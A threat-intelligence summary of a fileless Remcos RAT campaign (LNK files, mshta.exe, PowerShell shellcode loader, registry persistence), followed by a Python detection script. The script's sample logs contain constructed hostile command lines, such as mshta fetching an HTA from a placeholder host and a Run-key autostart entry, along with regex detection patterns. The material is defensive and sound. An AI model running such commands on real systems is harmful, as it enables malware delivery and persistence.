Source: blog.qualys.com
A new fileless malware campaign is deploying the Remcos RAT (Remote Access Trojan) using a PowerShell-based shellcode loader, highlighting the evolving tactics of cybercriminals. The attack begins with malicious LNK files embedded within ZIP archives, often disguised as legitimate Office documents to entice users into opening them. Upon execution, the attack chain leverages mshta.exe, a legitimate Microsoft tool, for proxy execution, allowing it to bypass traditional antivirus and endpoint defenses by running HTML Applications (HTA).

mshta.exe then executes an obfuscated HTA file hosted on a remote server. The VBScript inside that HTA downloads a PowerShell script, a decoy PDF file, and a second HTA file. Critically, it also writes Windows Registry modifications so that the downloaded HTA file is launched automatically at system startup, establishing persistence. Once the PowerShell script runs, it reconstructs a shellcode loader that ultimately launches the Remcos RAT payload entirely in memory.

This fileless technique, where malicious code operates directly in the computer's memory, allows the malware to evade many traditional security solutions that rely on disk-based detection. Remcos RAT grants attackers full control over compromised systems, allowing for cyber espionage and data theft through features like keylogging, screenshot capture, and clipboard monitoring. The RAT establishes a TLS connection to a command-and-control server for persistent communication, enabling data exfiltration and remote control.
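Detection logic for the chain summarised above, written as an added example that is not from the Qualys report: it flags mshta.exe fetching a remote HTA, PowerShell spawned as a child of mshta.exe, and an HTA registered to autostart. The log lines are constructed in a flattened Sysmon-style key=value form, the domain and file paths are placeholders, and the Run key is assumed as the autostart location because the summary only says "Registry modifications".

```python
import re

# Constructed sample events (Sysmon-style process-creation and registry
# SetValue records, one per line). Domain and paths are placeholders,
# not indicators from the report.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta.exe https://example.invalid/stage.hta",
    r"Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Program Files\App\app.exe|CommandLine=mshta.exe C:\Program Files\App\help.hta",
    r"Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\mshta.exe|CommandLine=powershell.exe -File C:\Users\Public\stage.ps1",
    r"Image=C:\Windows\System32\notepad.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe notes.txt",
    # Assumed persistence location: HKU\...\CurrentVersion\Run (not stated in the summary).
    r"EventType=SetValue|Image=C:\Windows\System32\mshta.exe|TargetObject=HKU\S-1-5-21-CONSTRUCTED\Software\Microsoft\Windows\CurrentVersion\Run\Updater|Details=mshta.exe C:\Users\Public\update.hta",
]

# mshta invoked with an http(s) URL: the HTA is being pulled from a remote host.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I)
# Registry value written under a Run key.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
# Run value that points at mshta or an .hta file.
HTA_VALUE = re.compile(r"mshta|\.hta\b", re.I)


def parse_event(line):
    """Split 'k=v|k=v' into a dict; values may themselves contain '='."""
    return {k: v for k, v in (f.split("=", 1) for f in line.split("|") if "=" in f)}


def triage(lines):
    """Return (event_index, rule_name) for every event matching a rule."""
    hits = []
    for i, line in enumerate(lines):
        ev = parse_event(line)
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        cmd = ev.get("CommandLine", "")
        if image.endswith("\\mshta.exe") and MSHTA_REMOTE.search(cmd):
            hits.append((i, "mshta_remote_hta"))
        if image.endswith("\\powershell.exe") and parent.endswith("\\mshta.exe"):
            hits.append((i, "powershell_child_of_mshta"))
        if RUN_KEY.search(ev.get("TargetObject", "")) and HTA_VALUE.search(ev.get("Details", "")):
            hits.append((i, "hta_autorun_registry"))
    return hits


if __name__ == "__main__":
    for idx, rule in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

The second event (a locally installed HTA opened by its own application) is deliberately left unflagged to show the remote-URL condition doing its work.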

References:
  • Anonymous: Experts reveal a fileless malware attack using PowerShell to execute Remcos RAT, employing LNK files and mshta.exe to evade detection, raising alarms about advanced evasion techniques in cybercriminal activities.
  • securityonline.info: Stealthy Remcos RAT Campaign Uses PowerShell to Evade Antivirus Detection
  • The Hacker News: Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks
Classification:
  • HashTags: #FilelessMalware #RemcosRAT #PowerShell
  • Company: Qualys
  • Target: Compromised Systems
  • Product: PowerShell
  • Feature: Fileless Execution
  • Malware: Remcos RAT
  • Type: Malware
  • Severity: Major